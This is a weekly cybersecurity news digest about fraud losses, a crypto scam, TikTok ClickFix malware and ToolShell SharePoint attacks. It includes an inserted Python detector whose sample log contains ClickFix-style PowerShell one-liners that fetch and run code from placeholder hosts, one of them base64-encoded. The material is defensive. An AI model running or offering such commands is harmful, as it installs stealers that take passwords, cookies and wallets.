A digest of the week’s most important cybersecurity news.
- Cybercriminals stole 450 million rubles from a Moscow resident.
- A pensioner from Ternopil tried crypto investing and lost his savings.
- Cybercriminals used TikTok videos to spread malware.
- A Symantec report revealed details of large-scale attacks on the infrastructure of many countries.
Cybercriminals stole 450 million rubles from a Moscow resident
Cybercrime losses in Moscow reached 34 billion rubles in the first six months of 2025, Police Colonel Anton Kononenko, head of the cybercrime unit (UBK) of the Ministry of Internal Affairs for the capital, said in an interview with Interfax.
“Crimes are now being committed for one million rubles and above; there are almost no minor ones left. Compared with previous years, the amount of damage from the actions of cyber fraudsters in the capital is tending to grow,” Kononenko commented.
According to law enforcement, in the spring cybercriminals set a record by stealing 450 million rubles.
Kononenko said losses have been increasing over the past three years. If previously most theft investigations involved sums up to 50,000 rubles, now around 80% of detected crimes fall into the categories of serious (damage from 250,000 rubles) and especially serious.
A Ternopil pensioner tried crypto investing and lost his savings
A 64-year-old resident of Ternopil fell victim to fraudsters, losing about 1 million hryvnias, the press service of the Ternopil District Police Department reports.
According to police, the victim saw a social media advertisement for investment courses and promises of earnings. He followed a link and contacted a person who introduced himself as a broker-analyst.
After registering on the site, the pensioner began transferring money from his e-wallet to the specified account. When the total reached $28,100, the “broker” stopped responding and access to the platform was blocked.
Cybercriminals used TikTok videos to distribute malware
On 17 October, ISC Handler Xavier Mertens reported an ongoing campaign that uses TikTok videos to spread malware.
Infostealing malware is disguised as free guides to activate popular programmes such as Windows, Spotify and Netflix.
The videos use a ClickFix social-engineering technique, in which attackers present supposedly legitimate “solutions” or instructions.
In fact, victims are induced to run malicious PowerShell commands or other scripts that infect their computers.
Each video shows a short one-line command and urges viewers to run it as administrator in PowerShell.
Once launched, the malware connects to a remote site and fetches another script, which downloads and installs two executables from Cloudflare Pages. The first is a variant of Aura Stealer—malware that steals:
- passwords saved in the browser;
- authentication cookies;
- cryptocurrency wallet data;
- credentials from other applications.
All collected data is sent to the attackers, giving them access to the victim’s accounts.
Mertens added that a second file, source.exe, is also downloaded; it invokes the Visual C# compiler (csc.exe) that ships with Windows to compile code on the fly, which then runs in memory. The purpose of this second module remains unknown.
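The defensive counterpart to the chain described above is to look for the "paste this one-liner into PowerShell" pattern in command-line or script-block logs. The following is an added example, not code from the article or from Mertens' analysis: it scores command lines for co-occurring download-and-execute indicators (remote fetch, Invoke-Expression, hidden window, execution-policy bypass), decodes -EncodedCommand payloads before scoring them, and runs over a constructed sample log whose format, usernames and URLs are all assumptions.

```python
import base64
import re
# Weighted indicators of a "paste this into PowerShell" download-and-execute one-liner.
# No single indicator is damning (admins fetch URLs too); a line is flagged only when several co-occur.
INDICATORS = [
    (re.compile(r"\b(?:iex|invoke-expression)\b", re.I), 3, "invoke-expression"),
    (re.compile(r"\b(?:irm|iwr|invoke-restmethod|invoke-webrequest|downloadstring)\b", re.I), 2, "remote fetch"),
    (re.compile(r"https?://", re.I), 1, "url"),
    (re.compile(r"-(?:ep|executionpolicy)\s+bypass", re.I), 2, "execution policy bypass"),
    (re.compile(r"-w(?:indowstyle)?\s+hidden", re.I), 1, "hidden window"),
]
# -EncodedCommand payloads hide the same verbs behind base64 of UTF-16LE text.
ENCODED = re.compile(r"-e(?:nc|ncodedcommand)?\b\s+([A-Za-z0-9+/=]{16,})", re.I)

def decode_encoded_command(cmd):
    """Return the plaintext of a -EncodedCommand payload, or None if absent or invalid."""
    m = ENCODED.search(cmd)
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le") if m else None
    except (ValueError, UnicodeDecodeError):
        return None

def score_command(cmd):
    """Score one command line; an encoded payload is decoded and scored as well."""
    decoded = decode_encoded_command(cmd)
    score, hits = (2, ["encoded command"]) if decoded else (0, [])
    for pattern, weight, label in INDICATORS:
        if pattern.search(cmd) or (decoded and pattern.search(decoded)):
            score += weight
            hits.append(label)
    return score, hits

def triage(log_lines, threshold=5):
    """Flag lines in the constructed '<timestamp> <user> <command>' format that reach the threshold."""
    flagged = []
    for line in log_lines:
        ts, user, cmd = line.split(" ", 2)
        score, hits = score_command(cmd)
        if score >= threshold:
            flagged.append({"time": ts, "user": user, "score": score, "hits": hits})
    return flagged

# Constructed sample log (assumed format): two benign admin commands, then two ClickFix-style lines.
ENCODED_SAMPLE = base64.b64encode("iex (irm https://cdn.example.invalid/run.ps1)".encode("utf-16-le")).decode()
SAMPLE_LOG = [
    "2025-10-17T10:01:02Z alice Get-ChildItem C:\\Users\\alice\\Documents",
    "2025-10-17T10:02:10Z alice Invoke-WebRequest https://www.example.com/ -OutFile page.html",
    "2025-10-17T10:05:44Z bob powershell -ep bypass -w hidden -c \"iex (irm https://activation.example.invalid/free-windows)\"",
    f"2025-10-17T10:06:30Z bob powershell -nop -w hidden -enc {ENCODED_SAMPLE}",
]
```

Only the two lines pasted by "bob" cross the threshold; the plain Invoke-WebRequest download scores 3 and is left alone, which is the point of weighting rather than alerting on any single verb.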
Symantec report details large-scale attacks on the infrastructure of many countries
Hackers linked to China used the ToolShell vulnerability in Microsoft SharePoint to attack government departments, universities, telecom providers and financial organisations, according to a Symantec report.
The flaw affects on-premises SharePoint servers and became known in July, after large-scale attacks by Chinese hackers. It can be exploited remotely without authentication to execute code and gain full access to the file system.
During the campaign, the attackers used malware typically associated with the Chinese hacking group Salt Typhoon.
According to Symantec, ToolShell was used to compromise organisations in the Middle East, South America, the United States and Africa. The attacks hit:
- a telecom provider in the Middle East;
- two government departments in an unnamed African country;
- two government agencies in South America;
- a university in the United States;
- a government technology agency in Africa;
- a government department in the Middle East;
- a European financial company.
Notably, the attack was executed through legitimate executables from Trend Micro and Bitdefender. For the South American scheme, the attackers used a file with a name resembling Symantec.
Researchers noted the use of publicly available tools, including Microsoft’s certutil utility, the GoGo Scanner and Revsocks, a reverse SOCKS proxy that enables data exfiltration via a remote server.
Also on ForkLog:
- Meteora’s co-founder was accused of ties to the MELANIA and LIBRA scam.
- Myanmar’s military raided the KK Park scam centre.
- DEX Bunni shut down after an $8.4m hack.
- Hackers moved 15,959 BTC from LuBian addresses.
- ZachXBT uncovered a scheme to steal $3m in XRP from an American’s wallet.
What to read this weekend?
The P2P segment in Russia has turned into a laundromat for dirty money, a breeding ground for grey schemes and a haven for fraudsters. As usual, ordinary users are the ones who suffer. In a new piece, ForkLog examines where the segment went off course.
